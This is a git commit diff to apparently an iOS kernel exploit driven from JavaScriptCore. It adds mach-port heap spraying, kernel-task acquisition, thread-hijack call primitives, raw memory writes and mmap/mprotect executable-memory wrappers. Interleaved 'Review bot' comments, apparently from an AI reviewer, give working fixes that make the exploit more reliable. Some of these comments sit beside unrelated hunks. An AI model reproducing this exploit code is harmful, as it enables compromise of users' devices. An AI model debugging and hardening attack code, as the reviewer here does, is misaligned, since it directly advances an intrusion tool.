| author | spv <aquaticvegetable@gmail.com> | 2022-04-24 21:30:15 -0400 |
|---|---|---|
| committer | spv <aquaticvegetable@gmail.com> | 2022-04-24 21:30:15 -0400 |
| commit | 7de438565f03123d37f737d2cd905579e90bc21e (patch) | |
| tree | 2459045c6f8035aac6340361170142a144c0274f /src/js | |
| parent | 5f9294a0e7aac5b9e105ccee737e42fc5c4cff63 (diff) | |
yeet
Diffstat (limited to 'src/js')
| -rwxr-xr-x[-rw-r--r--] | src/js/kexp/exploit.js | 79 | ||||
| -rwxr-xr-x[-rw-r--r--] | src/js/lib/myutils.js | 6 | ||||
| -rw-r--r-- | src/js/main.js | 13 | ||||
| -rw-r--r-- | src/js/primitives/call.js | 25 | ||||
| -rw-r--r-- | src/js/primitives/mem.js | 15 |
5 files changed, 107 insertions, 31 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index c28e59c..e0ef574 100644..100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -29,6 +29,7 @@ var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x2;
 var req_init_port_set_address = 0x0
 var req_init_port_set_count = 0x4
+var task_self = 0;
 var kslide = 0;
 var fakeportData = 0;
@@ -93,7 +94,7 @@ function spray_data(mem, size, num, portptr) {
 function copyinPort(kport, cnt) {
 var err = malloc(4);
 var ret = 0;
- var self = mach_task_self();
+ var self = task_self;
 var service = MACH_PORT_NULL;
 var client = malloc(4);
 var it = malloc(4);
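Review bot: `var task_self = 0;` makes MACH_PORT_NULL the default task, and copyinPort now hands it straight to the mach_port_* calls via `var self = task_self;` — anything that runs before get_kernel_task() performs the only assignment visible in this commit will operate on the null task, and because none of the kern_return_t values are checked the failure is silent. If mach_task_self is resolvable at load time, initialise at the declaration, `var task_self = mach_task_self();`; otherwise give the consumers a fallback such as `var self = task_self || mach_task_self();`. copyinPort's body continues past the end of the hunk, so I cannot tell whether it is reached before get_kernel_task.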
@@ -180,23 +181,43 @@ function spray(dict, size, port) {
 var kp = 0;
 function spray_ports(number_port_descs) {
- printf("spray_ports\n");
+ printf("spray_ports %d\n", number_port_descs);
 if (kp == 0) {
 kp = malloc(4);
- mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, kp);
- mach_port_insert_right(mach_task_self(), read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND);
+ mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp);
+ mach_port_insert_right(task_self, read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND);
 }
 var mp = malloc(4);
- mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, mp);
- printf("%x\n", read_u32(mp));
- mach_port_insert_right(mach_task_self(), read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND);
+ mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp);
+ var rmp = read_u32(mp);
+ mach_port_insert_right(task_self, rmp, rmp, MACH_MSG_TYPE_MAKE_SEND);
- send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
+ send_ports(rmp, read_u32(kp), 2, number_port_descs);
 return mp;
 }
+function fast_log2(n) {
+ var i = 0;
+ while (n >>= 1) {
+ i++;
+ }
+
+ return i;
+}
+
+function fast_array_mul(arr, n) {
+ var tmp_arr = arr;
+ var done = 0;
+ for (var i = 0; i < fast_log2(n) + 2; i++) {
+ tmp_arr = tmp_arr.concat(tmp_arr);
+ done = (1 << i);
+ }
+
+ return tmp_arr;
+}
+
 function send_ports(target, payload, num, number_port_descs) {
 var init_port_set = malloc(num * 4);
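Review bot: `fast_array_mul(arr, n)` does not produce n copies of arr: it doubles floor(log2 n)+2 times, so the result holds between 2n and 4n copies (4 for n=1, 8 for n=3, 16 for n=5), and `done` is assigned but never read. send_ports appears to compensate by over-allocating its message buffer, but the name and the call site read as if exactly n descriptors were produced, so either document the overshoot or make the function exact as below. fast_log2 also mutates its parameter through `n >>= 1`, which is harmless here but deserves a one-line comment.
```javascript
// Return an array holding exactly n back-to-back copies of arr.
// Doubles with concat until the target length is reached, then trims.
function fast_array_mul(arr, n) {
  var target = arr.length * n;
  var tmp_arr = arr;
  while (tmp_arr.length < target) {
    tmp_arr = tmp_arr.concat(tmp_arr);
  }
  return tmp_arr.slice(0, target);
}
```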
@@ -204,23 +225,51 @@ function send_ports(target, payload, num, number_port_descs) {
 write_u32(init_port_set + (i << 2), payload);
 }
- var buf = malloc(0x1c + (number_port_descs * 0xc));
+ var buf = malloc(0x1c + (number_port_descs * 0xc * 8));
+ write_u32(buf + req_msgh_body_msgh_descriptor_count, number_port_descs);
+ var new_buf_ = new Array();
+ var tmp = u32_to_u8x4(init_port_set);
+ new_buf_.push(tmp[0]);
+ new_buf_.push(tmp[1]);
+ new_buf_.push(tmp[2]);
+ new_buf_.push(tmp[3]);
+ tmp = u32_to_u8x4(num);
+ new_buf_.push(tmp[0]);
+ new_buf_.push(tmp[1]);
+ new_buf_.push(tmp[2]);
+ new_buf_.push(tmp[3]);
+ new_buf_.push(0);
+ new_buf_.push(0);
+ new_buf_.push(19);
+ new_buf_.push(MACH_MSG_OOL_PORTS_DESCRIPTOR);
+
+ var new_buf = fast_array_mul(new_buf_, number_port_descs);
+
+ fast_write_buf(buf + req_init_port_set, new_buf);
+
+ /*
 for (var i = 0; i < number_port_descs; i++) {
 write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_address, init_port_set);
 write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_count, num);
 write_u8(buf + (req_init_port_set * (i + 1)) + 0x8, 0);
 write_u8(buf + (req_init_port_set * (i + 1)) + 0xa, 19);
 write_u8(buf + (req_init_port_set * (i + 1)) + 0xb, MACH_MSG_OOL_PORTS_DESCRIPTOR);
- }
+ }*/
 write_u32(buf + req_head_msgh_bits, 0x80001513); // MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE)
 write_u32(buf + req_head_msgh_request_port, target);
 write_u32(buf + req_head_msgh_reply_port, 0);
 write_u32(buf + req_head_msgh_id, 1337);
- return mach_msg(read_u32(buf + 0x0), read_u32(buf + 0x4), read_u32(buf + 0x8), read_u32(buf + 0xc), read_u32(buf + 0x10), read_u32(buf + 0x14), 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
+ var ret = mach_msg(buf, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
+
+ free(buf);
+
+ printf("%d %s\n", ret, mach_error_string(ret));
+
+ return ret;
 }
 function get_kernel_task() {
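Review bot: `init_port_set`, allocated with malloc(num * 4) at the top of send_ports, is never released, while the new `free(buf);` releases only the message buffer; spray_ports calls send_ports on every spray iteration, so this leaks 4*num bytes per call — add `free(init_port_set);` beside `free(buf);` (after mach_msg has returned, since the OOL descriptors point into it). The old descriptor loop is kept as a `/* ... */` block; now that fast_write_buf replaces it, delete it rather than let it drift out of date. send_ports begins before this hunk.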
@@ -229,11 +278,13 @@ function get_kernel_task() {
 sanity_port = malloc(4);
- mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, sanity_port);
- mach_port_insert_right(mach_task_self(), read_u32(sanity_port), read_u32(sanity_port), MACH_MSG_TYPE_MAKE_SEND);
+ task_self = mach_task_self();
+
+ mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, sanity_port);
+ mach_port_insert_right(task_self, read_u32(sanity_port), read_u32(sanity_port), MACH_MSG_TYPE_MAKE_SEND);
 limits = malloc(4);
 write_u32(limits, 1000);
- mach_port_set_attributes(mach_task_self(), read_u32(sanity_port), MACH_PORT_LIMITS_INFO, limits, MACH_PORT_LIMITS_INFO_COUNT);
+ mach_port_set_attributes(task_self, read_u32(sanity_port), MACH_PORT_LIMITS_INFO, limits, MACH_PORT_LIMITS_INFO_COUNT);
 printf("starting exploit\n");
diff --git a/src/js/lib/myutils.js b/src/js/lib/myutils.js
index 51fc055..325c490 100644..100755
--- a/src/js/lib/myutils.js
+++ b/src/js/lib/myutils.js
@@ -112,4 +112,8 @@ var io_service_open_extended = scall_wrapper("io_service_open_extended");
 var IORegistryEntryGetChildIterator = scall_wrapper("IORegistryEntryGetChildIterator");
 var IOIteratorNext = scall_wrapper("IOIteratorNext");
 var IORegistryEntryGetProperty = scall_wrapper("IORegistryEntryGetProperty");
-var mach_msg = scall_wrapper("mach_msg");
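Review bot: the three mach_port_* calls rewritten here still discard their kern_return_t, and now that the task argument is the plain variable `task_self` rather than a fresh mach_task_self() call, a stale or zero value would make every one of them fail with no trace before the code announces "starting exploit". Capture at least the first one: `var kr = mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, sanity_port);` followed by `if (kr != 0) { printf("mach_port_allocate: %s\n", mach_error_string(kr)); return; }` — mach_error_string is already used by send_ports in this commit. get_kernel_task's body continues past the hunk.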
\ No newline at end of file
+var mach_msg = scall_wrapper("mach_msg");
+var mmap = scall_wrapper("mmap");
+var free = scall_wrapper("free");
+var mlock = scall_wrapper("mlock");
+var mprotect = scall_wrapper("mprotect");
\ No newline at end of file
diff --git a/src/js/main.js b/src/js/main.js
index 4d978ef..ee0a627 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -12,6 +12,13 @@ var ARM_THREAD_STATE_COUNT = 0x11;
 var ARM_THREAD_STATE = 0x1;
 var LOG_SYSLOG = 0x28;
+var PROT_READ = 0x1;
+var PROT_WRITE = 0x2;
+var PROT_EXEC = 0x4;
+
+var MAP_PRIVATE = 0x2;
+var MAP_ANON = 0x1000;
+
 try {
 puts("we out here in jsc");
 } catch (e) {
@@ -22,10 +29,6 @@ try {
 puts = function (){};
 }
-function csbypass() {
-
-}
-
 function main() {
 /*
 * get slide and calculate slid base
@@ -45,8 +48,6 @@ function main() {
 puts("we out here");
 puts("I came through a portal holding a 40 and a blunt. Do you really wanna test me right now?");
-// csbypass();
-
 printf("slide=0x%x\n", slide);
 printf("*(uint8_t*)base = 0x%x\n", read_u8(base));
 printf("*(uint16_t*)base = 0x%x\n", read_u16(base));
diff --git a/src/js/primitives/call.js b/src/js/primitives/call.js
index 97a47b6..e382470 100644
--- a/src/js/primitives/call.js
+++ b/src/js/primitives/call.js
@@ -118,6 +118,8 @@ function calls4arg(sym, r0, r1, r2, r3) {
 return call4arg(addy, r0, r1, r2, r3);
 }
+var rth = 0;
+
 function callnarg() {
 if (arguments.length < 1) {
 return printf("error: tried to run callnarg without args. arguments.length=%d\n", arguments.length);
@@ -153,8 +155,15 @@ function callnarg() {
 calls4arg("pthread_create", threadptr, 0, __stack_chk_fail_resolver + dyld_shc_slide, 0);
 thread = read_u32(threadptr);
 write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0));
+ rth = read_u32(th);
+ }
+
+ if (rth === 0) {
+ rth = read_u32(th);
+ }
+
+// calls4arg("thread_suspend", rth, 0, 0, 0);
+
 /*
 * write first 4 to r0-r3, rest to stack
 */
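Review bot: the new `rth` cache in callnarg is filled twice — `rth = read_u32(th);` inside the thread-creation branch and again under `if (rth === 0)` — so the second block is either redundant or covers a path where the thread port already existed before this commit; whichever it is, the intent should be stated, e.g. `// rth caches the mach thread port so later thread_* calls skip re-reading th`. The commented-out `// calls4arg("thread_suspend", rth, 0, 0, 0);` should be removed rather than shipped. The `if` that creates the thread, and callnarg itself, begin before this hunk, so I cannot see what else writes `th`.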
@@ -198,12 +207,8 @@ function callnarg() {
 /*
 * set the state
 */
- calls4arg("thread_set_state", read_u32(th), ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT);
-
- /*
- * probably un-necessary now, keeping in just in case for now
- */
- calls4arg("thread_resume", read_u32(th), 0, 0, 0);
+ calls4arg("thread_set_state", rth, ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT);
+ calls4arg("thread_resume", rth, 0, 0, 0);
 /*
 * spin wait for return
@@ -212,15 +217,15 @@ function callnarg() {
 /*
 * reset, it's used as input for thread_state size
 */
- write_u32(count, 0x100);
- calls4arg("thread_get_state", read_u32(th), ARM_THREAD_STATE, thread_state, count);
+ write_u32(count, 17);
+ calls4arg("thread_get_state", rth, ARM_THREAD_STATE, thread_state, count);
 /*
 * if the pc is in (resolver, resolver + 8), suspend the thread
 * (to not spin endlessly), read r0 and return
 */
 if (((read_u32(thread_state + (15 << 2)) - (__stack_chk_fail_resolver + dyld_shc_slide)) <= 8) && (read_u32(thread_state + (11 << 2)) == 0x1337)) {
- calls4arg("thread_suspend", read_u32(th), 0, 0, 0);
+ calls4arg("thread_suspend", rth, 0, 0, 0);
 return read_u32(thread_state);
 }
@@ -262,7 +267,7 @@ function scall() {
 args_to_pass.push(sptr(arguments[i]));
 } else {
 args_to_pass.push(arguments[i]);
- if ((arguments[i] & 0xffff0000 == 0xffff0000 || arguments[i] & 0xffff0000 == 0xfffe0000)) {
+ if ((arguments[i] & 0xffff0000 == 0xffff0000 || arguments[i] & 0xffff0000 == 0xfffe0000) && (i == 1 || i == 3)) {
 force_callnarg = true;
 }
 }
diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js
index 85cd132..ff12fdd 100644
--- a/src/js/primitives/mem.js
+++ b/src/js/primitives/mem.js
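Review bot: the rewritten condition in scall() is wrong because of operator precedence — in JavaScript `==` binds tighter than `&`, so `arguments[i] & 0xffff0000 == 0xffff0000` is `arguments[i] & (0xffff0000 == 0xffff0000)`, i.e. `arguments[i] & 1`, and the second operand is `arguments[i] & 0`; the new `&& (i == 1 || i == 3)` therefore forces callnarg for any odd value in slot 1 or 3, not for values in the 0xfffe0000/0xffff0000 ranges. Parenthesise and compare unsigned, since `&` yields a signed int32: `var hi = (arguments[i] & 0xffff0000) >>> 0;` then `if ((hi == 0xffff0000 || hi == 0xfffe0000) && (i == 1 || i == 3)) {`. The defect predates this commit but the line is rewritten here. In the second hunk on this line, `write_u32(count, 17);` should use `ARM_THREAD_STATE_COUNT` (0x11 == 17), the constant thread_set_state already passes two hunks earlier.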
@@ -91,6 +91,21 @@ function write_u32_buf(addy, buf, len) {
 return buf;
 }
+function fast_write_buf(addy, buf) {
+ var upper_i = Math.floor(buf.length / 0x100);
+
+ for (var i = 0; i < upper_i; i++) {
+ u8x4 = u32_to_u8x4(addy + (i * 0x100));
+ parent[VECTOR_OFFSET + 0x0] = u8x4[0];
+ parent[VECTOR_OFFSET + 0x1] = u8x4[1];
+ parent[VECTOR_OFFSET + 0x2] = u8x4[2];
+ parent[VECTOR_OFFSET + 0x3] = u8x4[3];
+ for (var j = (i * 0x100); (j < (i * 0x100) + 0x100) && (j < buf.length); j++) {
+ child[j % 0x100] = buf[j];
+ }
+ }
+}
+
 /*
 * write uint8_t
 */ |
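Review bot: `Math.floor(buf.length / 0x100)` in fast_write_buf drops the final partial window — for a buf shorter than 0x100 bytes upper_i is 0 and nothing is written at all, and for any length that is not a multiple of 0x100 the tail is skipped, even though the inner loop already bounds j by buf.length; use `var upper_i = Math.ceil(buf.length / 0x100);`. With the 12-byte-per-descriptor array send_ports feeds it, this silently affects every small number_port_descs. `u8x4` is also assigned without a declaration and becomes an implicit global; write `var u8x4 = u32_to_u8x4(addy + (i * 0x100));`. A one-line comment that `parent[VECTOR_OFFSET..+3]` presumably repoints `child` at a 0x100-byte window (confirm against the primitive's setup) would make the loop readable.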
